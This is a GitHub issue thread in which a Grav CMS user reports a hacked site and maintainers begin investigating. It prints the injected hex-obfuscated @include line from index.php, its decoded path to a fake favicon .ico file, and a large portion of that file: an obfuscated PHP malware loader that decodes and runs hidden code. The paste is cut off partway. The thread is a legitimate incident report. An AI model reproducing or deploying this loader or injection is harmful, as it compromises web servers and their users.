getgrav / grav

Modern, Crazy Fast, Ridiculously Easy and Amazingly Powerful Flat-File CMS powered by PHP, Markdown, Twig, and Symfony
https://getgrav.org
MIT License

Major security issues #1985

Closed avxkim closed 6 years ago

avxkim commented 6 years ago

Today I've noticed that someone hijacked my Grav site on a VPS (none of the other sites was affected, just Grav). I found they had added this code to my root index.php:

/*07cd0*/

@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";

/*07cd0*/

How is that possible? I've set correct permissions on files and dirs. Does the Admin plugin have flaws?

mahagr commented 6 years ago

@heihachi88 Could you please email me (matias@trilby.media, CC andy@trilby.media) with zipped folder of your site?

avxkim commented 6 years ago

Sent it already.

mahagr commented 6 years ago

Did you remove the offending line already? Where was it? Did you do anything else to the site?

dimitrilongo commented 6 years ago

For investigation purposes, decoded: @include "/srv/www/serkeorg//node_modules/path-root-regex/favicon_cea5e6.ico"; maybe malware.

mahagr commented 6 years ago

Yea, I just cannot find that file in the zip. Can you find it?

It points to a potential vulnerability in node libraries.

avxkim commented 6 years ago

I removed it manually already; the question is how is that possible? Here are the contents of that malware file, favicon_cea5e6.ico:

<?php
if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))
{
define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

 $lowjgw = 8352; function geaunvl($mlegwah, $iwivfnsvi){$xxqtf = ''; for($i=0; $i < strlen($mlegwah); $i++){$xxqtf .= isset($iwivfnsvi[$mlegwah[$i]]) ? $iwivfnsvi[$mlegwah[$i]] : $mlegwah[$i];}
$lxsiqhofh="rawurl" . "decode";return $lxsiqhofh($xxqtf);}
$edkssedkbz = '%Km%Kl%Km%Kl%fKsws_nEW%I4%IiEggCg_NCv%Ii%Iq%IK2SZZ%Ir%Q0%Km%Kl%fKsws_nEW%I4%IiNCv_Egg'.
'Cgn%Ii%Iq%IKK%Ir%Q0%Km%Kl%fKsws_nEW%I4%IijpH_EHEoBW'.
'sCw_WsjE%Ii%Iq%IKK%Ir%Q0%Km%Kl%fKEggCg_gEYCgWswv%I4K%Ir%Q0%Km%Kl%fKnEW_WsjE_NsjsW%I4K%I'.
'r%Q0%Km%Kl%Km%Kl%Km%Klsa%I4%Ie6EaswE6%I4%IIz7z_cPZ%II%Ir%Ir%Km%Kl%i0%Km%Kl%IK%IK%'.
'IK%IK6EaswE%I4%IIz7z_cPZ%II%Iq%IK%II%Mqw%II%Ir%Q0%Km%Kl%im%Km%Kl%Km%Klsa'.
'%I4%Ie6EaswE6%I4%IIm3kcqUPkV_TczlklUPk%II%Ir%Ir%Km%Kl%i0%Km%Kl%IK%IK%IK%IK6EaswE%I4%IIm3kcqUPkV_Tczl'.
'klUPk%II%Iq%IK%II/%II%Ir%Q0%Km%Kl%im%Km%Kl%Km%Klsa%IK%I4%Ie6EaswE6%I'.
'4%IilZkclmV_kS2_effo4ioaGIQhp4IppasG4gspheGpWsCe4%Ii%Ir%Ir%Km%Kl%i0%K'.
'm%Kl%IK%IK%IK%IK6EaswE%I4%IilZkclmV_kS2_effo4ioaGIQhp4IppasG4g'.
'spheGpWsCe4%Ii%Iq%IKe%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%If6pWp%I'.
'K%Qm%IK2SZZ%Q0%Km%Kl%IK%IK%IK%IK%If6pWp_bE9%IK%Qm%IK2SZZ%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IfuZP0lZ'.
'T%M0%Iion_pBWA%Ii%Mm%IK%Qm%IK%Iiae6oMKiE-KGKf-faeQ-4aoI-a6QoMoaEr4e4%Ii%Q0%Km%Kl%IK%IK%IK%IKvNC'.
'hpN%IK%Ifon_pBWA%Q0%Km%Kl%Km%Kl%Km%Kl%IK%IK%IK%IKa'.
'BwoWsCw%IKon_hpnEGf_6EoC6E%I4%IfswYBW%Ir%IK%i0%Km%Kl%Km%Kl%IK%IK%IK'.
'%IK%IK%IK%IK%IKsa%IK%I4nWgNEw%I4%IfswYBW%Ir%IK%Qq%IKf%Ir%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IKgEWBgw%IK%II%II%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfbE9TWg%IK%Qm%IK%IIl0qmcLu73FdZx2PzRkTUSy8XV5pho6EavAs1bNjwCYDgnWBOJH9tKeIQfMG'.
'i4r%I0/%Qm%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfbE9n%'.
'IK%Qm%IKnWg_nYNsW%I4%IfbE9TWg%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfbE9n%IK%Qm%IKp'.
'ggp9_aNsY%I4%IfbE9n%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%Ifs%IK%Qm%IKK%Q0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%II%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfswYBW%IK%Qm%I'.
'KYgEv_gEYNpoE%I4%II%ic%M0%Mcl-5p-tK-r%Mq%I0%Mq/%Mq%Qm%Mm%ic%II%Iq'.
'%IK%II%II%Iq%IK%IfswYBW%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK6C%IK%i0%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IfEwoe%IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%'.
'Mm%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwoI%IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm'.
'%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwoQ%'.
'IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm%Mm%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfEwof%'.
'IK%Qm%IK%IfbE9n%M0%IfswYBW%M0%Ifs%I0%I0%Mm%Mm%Q0%Km%K'.
'l%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAge%IK%Qm%IK%I4%IfEwoe%IK%Qq%Qq%IKI%'.
'Ir%IK%iq%IK%I4%IfEwoI%IK%Qc%Qc%IKf%Ir%Q0%Km%Kl%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAgI%IK%Qm%IK%I4%I'.
'4%IfEwoI%IK%IG%IKeM%Ir%IK%Qq%Qq%IKf%Ir%IK%iq%IK%I4%I'.
'fEwoQ%IK%Qc%Qc%IKI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfoAgQ%IK%'.
'Qm%IK%I4%I4%IfEwoQ%IK%IG%IKQ%Ir%IK%Qq%Qq%IKG%Ir%IK%iq%IK%IfEwof%Q0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%IfCBWYBW%IK.%IKoAg%I4%IfoAge%Ir%Q0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%IfEwoQ%I'.
'K%Ie%Qm%IKGf%Ir%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBWYBW%IK%Qm%IK%IfC'.
'BWYBW%IK.%IKoAg%I4%IfoAgI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%'.
'IfEwof%IK%Ie%Qm%IKGf%Ir%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBWY'.
'BW%IK%Qm%IK%IfCBWYBW%IK.%IKoAg%I4%IfoAgQ%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK'.
'%IK%IK%IK%IK%IK%IK%IK%im%IKJAsNE%IK%I4%Ifs%IK%Qq%IKnWgNEw%I4%IfswYBW%I'.
'r%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%IfCBWYBW%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%'.
'Kl%IK%IK%IK%IKsa%IK%I4%IeaBwoWsCw_EHsnWn%I4%IiasNE_YBW_oC'.
'wWEwWn%Ii%Ir%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKaBwoWsC'.
'w%IKasNE_YBW_oCwWEwWn%I4%Ifw%Iq%IK%If6%Iq%IK%IfaNpv%IK%Qm%IKLpNnE%Ir%Km'.
'%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IfjC6E%IK%Qm%IK%IfaNpv%IK%Qm%Qm%IK4%IK%QL%IK%Iip%Ii%IK%Ql%IK%IiJ%Ii%Q0%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ifa%IK%Qm%IK%fKaCYEw%I4%Ifw%Iq%IK%IfjC6E%Ir%Q0%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%Ifa%IK%Qm%Q'.
'm%Qm%IKLpNnE%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKK%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4sn_pggp9%I4%If6%Ir%Ir%IK%If6%IK%Qm%I'.
'KsjYNC6E%I4%If6%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%Ifh9WEn_JgsWWEw%IK%Qm%IKaJgsWE%I4%Ifa%Iq%IK%If6%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IKaoNCnE%I4%Ifa%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%'.
'Ifh9WEn_JgsWWEw%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%'.
'Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKsa%IK%I4%IeaBwoWsCw_EHsnWn%I4%IiasNE_vEW_oCwW'.
'EwWn%Ii%Ir%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKaBwoWs'.
'Cw%IKasNE_vEW_oCwWEwWn%I4%IfasNEwpjE%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfaApw6NE%IK%Qm%IKaCYEw%I4%IfasNEwpjE%'.
'Iq%IK%IIg%II%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfaoCwWEwWn%IK%Qm%IKagEp6%I4%IfaApw6NE%Iq%IKasNEnstE%I4%IfasNEwpjE%Ir%Ir%Q'.
'0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKaoNCnE%I4%IfaApw6NE%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IK%IfaoCwWEwWn%Q0%Km%Kl%IK%'.
'IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IKaBwoWsCw%IK'.
'on_vEW_oBggEwW_asNEYpWA%I4%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK'.
'gEWBgw%IKWgsj%I4YgEv_gEYNpoE%I4%II/%Mq%I4.%Il%Mq%If/%II%Iq%IK%Ii%Ii%Iq%IK__L3Zc__%Ir%Ir'.
'%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_'.
'6Eog9YW_YApnE%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IfCBW_6pWp%IK%Qm%IK%II%II%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%I'.
'K%IK%IKaCg%IK%I4%Ifs%QmK%Q0%IK%Ifs%QqnWgNEw%I4%If6pWp%Ir%Q0%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
'i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKaCg%IK%I4%I'.
'f1%QmK%Q0%IK%If1%QqnWgNEw%I4%IfbE9%Ir%IK%IG%IG%IK%Ifs%QqnWgNEw%I4%If6pWp%I'.
'r%Q0%IK%If1%I0%I0%Iq%IK%Ifs%I0%I0%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfCBW_6pWp%'.
'IK.%Qm%IKoAg%I4Cg6%I4%If6pWp%M0%Ifs%Mm%Ir%IK%Mc%IKCg6%I4%IfbE9%M0%If1%Mm%Ir%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%I'.
'K%IK%IK%IKgEWBgw%IK%IfCBW_6pWp%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%I'.
'Kon_6Eog9YW%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%'.
'IK%IK%IK%IKvNChpN%IK%Ifon_pBWA%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKon_6Eog9'.
'YW_YApnE%I4on_6Eog9YW_YApnE%I4%If6pWp%Iq%IK%IfbE9%Ir%Iq%IK%Ifon_pBWA%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_Ewog9YW%I4%If6pWp%Iq%IK%IfbE9%Ir%Km%Kl%IK'.
'%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKvNChpN%IK%If'.
'on_pBWA%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKgEWBgw%IKon_6E'.
'og9YW_YApnE%I4on_6Eog9YW_YApnE%I4%If6pWp%Iq%IK%Ifon_pBWA%'.
'Ir%Iq%IK%IfbE9%Ir%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon'.
'_vEW_YNBvsw_oCwasv%I4%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IfnENa_oCwWEwW%IK%Qm%IK%fKasNE_vEW_oCwWEwWn%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Q0%Km%Kl%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_YCn%IK%Qm%IKnWgYCn%I4%IfnE'.
'Na_oCwWEwW%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%I'.
'K%I4%IfoCwasv_YCn%IK%Ie%Qm%Qm%IKLlZTc%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv%IK%Qm%IKnBhnWg%I4%IfnENa_oCwWE'.
'wW%Iq%IK%IfoCwasv_YCn%IK%I0%IKQI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IfYNBvswn%IK%Qm%IK%fKBwnEgspNstE%I4on_6Eog9YW%I4gpJBgN6EoC6E%I4'.
'%IfoCwasv%Ir%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Ir%Q0%'.
'Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKE'.
'NnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKlggp9%I4%Ir%Q0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKgEWBgw%IK%IfYNBvswn%Q0%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%'.
'IK%IK%IKaBwoWsCw%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IfoCwasv_Ewo%IK%Qm%IKgpJBgNEwoC6E%I4on_Ewog9YW%I4%fKnEgspNstE%I4%IfYNBvswn%Ir%Iq'.
'%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IfnENa_oCwWEwW%IK%Qm%IK%fKasNE_vEW_oCwWEwWn%I4on_vEW_oBggEwW_asN'.
'EYpWA%I4%Ir%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_YCn%IK%Qm%IKnWgYCn%I4%IfnENa_oCwWEw'.
'W%Iq%IKj6M%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Ir%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%I'.
'foCwasv_YCn%IK%Ie%Qm%Qm%IKLlZTc%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IfoCwasv_CN6%IK%Qm%IKnBhnWg%I4%IfnENa_oCwWEwW%Iq%IK%'.
'IfoCwasv_YCn%IK%I0%IKQI%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IfnENa_oCwWEwW%'.
'IK%Qm%IKnWg_gEYNpoE%I4%IfoCwasv_CN6%Iq%IK%IfoCwasv_E'.
'wo%Iq%IK%IfnENa_oCwWEwW%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IKENnE%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IfnENa_oCwWEwW%IK%Qm%IK%IfnENa_oCwWEwW%IK.%IK%II%Mqw%Mqw//%II%IK.%IKj6M%I4on_vEW_oBggEwW_'.
'asNEYpWA%I4%Ir%Ir%IK.%IK%IfoCwasv_Ewo%Q0%Km%Kl%IK%IK%IK%I'.
'K%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
'fKasNE_YBW_oCwWEwWn%I4on_vEW_oBggEwW_asNEYpWA%I4%Ir%Iq%IK%IfnENa_oCwWEwW%Ir%Q0%Km%Kl%IK%IK%IK%IK%'.
'im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_p66%I4%IfwpjE%Iq%IK%IfhpnEGf_6pWp'.
'%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKon_'.
'vEW_YNBvsw_oCwasv%I4%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%M0%IfwpjE%Mm%IK%Qm%'.
'IKon_hpnEGf_6EoC6E%I4%IfhpnEGf_6pWp%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Q0%Km%Kl%IK%IK%IK%I'.
'K%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_gEj'.
'%I4%IfwpjE%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IfYNBvswn%IK%Qm%IKon_vEW_YN'.
'Bvsw_oCwasv%I4%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKBwnEW%I4%IfYNBvswn%M0%IfwpjE%M'.
'm%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKon_nEW_YNBvsw_oCwasv%I4%IfYNBvswn%Ir%Q0%Km%Kl%IK%IK%'.
'IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaBwoWsCw%IKon_YNBvsw_NCp'.
'6%I4%IfwpjE%Qm2SZZ%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IKaCgEpoA%IK%I4on_vEW_YNBvsw_oCwasv%I4%Ir%IKpn%I'.
'K%IfYwpjE%Qm%Qc%IfYoCwWEwW%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%IfwpjE%Ir%Km%Kl%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4nWgojY%I4%IfwpjE%Iq%IK%IfYwpjE%Ir%IK%'.
'Qm%Qm%IKK%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%IfYoCwWEwW%Ir%Q0%'.
'Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IKhgEpb%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnE%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%IfY'.
'oCwWEwW%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%'.
'IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%im%Km%Kl%Km%Kl%IK%IK%IK%IKaCgEpoA%IK%I4pggp9_jEgvE%I4%If_qPP'.
'd3c%Iq%IK%If_zPTU%Ir%IKpn%IK%If6pWp_bE9%IK%Qm%Qc%IK%If6pWp%Ir%Km%Kl%IK%IK%IK%IK%i0%Km%Kl%IK%I'.
'K%IK%IK%IK%IK%IK%IK%If6pWp%IK%Qm%IK%fKBwnEgspNstE%I4on_6Eog9YW%I4on_hpnEGf_6EoC6E%I4%If6pWp'.
'%Ir%Iq%IK%If6pWp_bE9%Ir%Ir%Q0%Km%Kl%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4snnEW%I4%If6pWp%M0%Iip'.
'b%Ii%Mm%Ir%IK%IG%IG%IK%Ifon_pBWA%Qm%Qm%If6pWp%M0%Iipb%Ii%'.
'Mm%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKsa%IK%I4%If6p'.
'Wp%M0%Iip%Ii%Mm%IK%Qm%Qm%IK%Iis%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ifs%IK%Qm%IKlggp9%I4%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IiYO%'.
'Ii%IK%Qm%Qc%IK%fKYAYOEgnsCw%I4%Ir%Iq%Km%Kl%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IinO%Ii%IK%Q'.
'm%Qc%IK%IiI.K-e%Ii%Iq%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%'.
'IK%IK%IK%IK%IK%IK%Iipb%Ii%IK%Qm%Qc%IK%If6pWp%M0%Iipb%Ii%Mm%Iq%Km%'.
'Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%Ir%Q0%Km%Kl%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEoAC%IK%fKnEgspNstE%I4%Ifs%Ir'.
'%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEHsW%Q0%Km%K'.
'l%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IKENnEsa%IK%I4%If6pWp%M0%Iip%Ii%Mm%IK%'.
'Qm%Qm%IK%IiE%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKEOpN%I4%If6pWp%M0%Ii6%Ii%M'.
'm%Ir%Q0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%IK%IK%IK%IK%IK%I'.
'K%IK%IK%IK%IK%IKENnEsa%IK%I4%If6pWp%M0%Iip%Ii%Mm%IK%Qm%Qm%IK%IiYNBvsw%Ii%Ir%Km%Kl%IK%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IKsa%I4%If6pWp%M0%Iinp%Ii%Mm%IK%Qm%Qm%IK%Iip66%Ii%Ir%K'.
'm%Kl%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%i0%Km%Kl%IK%IK%IK%IK%IK'.
'%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKon_YNBv'.
'sw_p66%I4%If6pWp%M0%IiY%Ii%Mm%Iq%IK%If6pWp%M0%Ii6%Ii%Mm%Ir%Q0%Km%Kl%'.
'IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%im%Km%Kl%IK%I'.
'K%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IK%IKENnEsa%I4%If6pWp%M0%Iinp%Ii%Mm'.
'%IK%Qm%Qm%IK%IigEj%Ii%Ir%Km%Kl%IK%IK%IK%IK%IK%IK%IK%IK%'.
